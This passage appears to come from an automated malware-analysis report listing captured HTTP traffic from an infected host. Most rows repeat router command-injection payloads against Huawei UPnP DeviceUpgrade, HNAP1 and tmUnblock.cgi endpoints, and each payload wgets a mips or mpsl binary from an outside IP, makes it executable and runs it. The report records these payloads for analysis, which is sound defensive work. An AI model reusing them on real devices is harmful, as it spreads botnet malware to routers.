62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 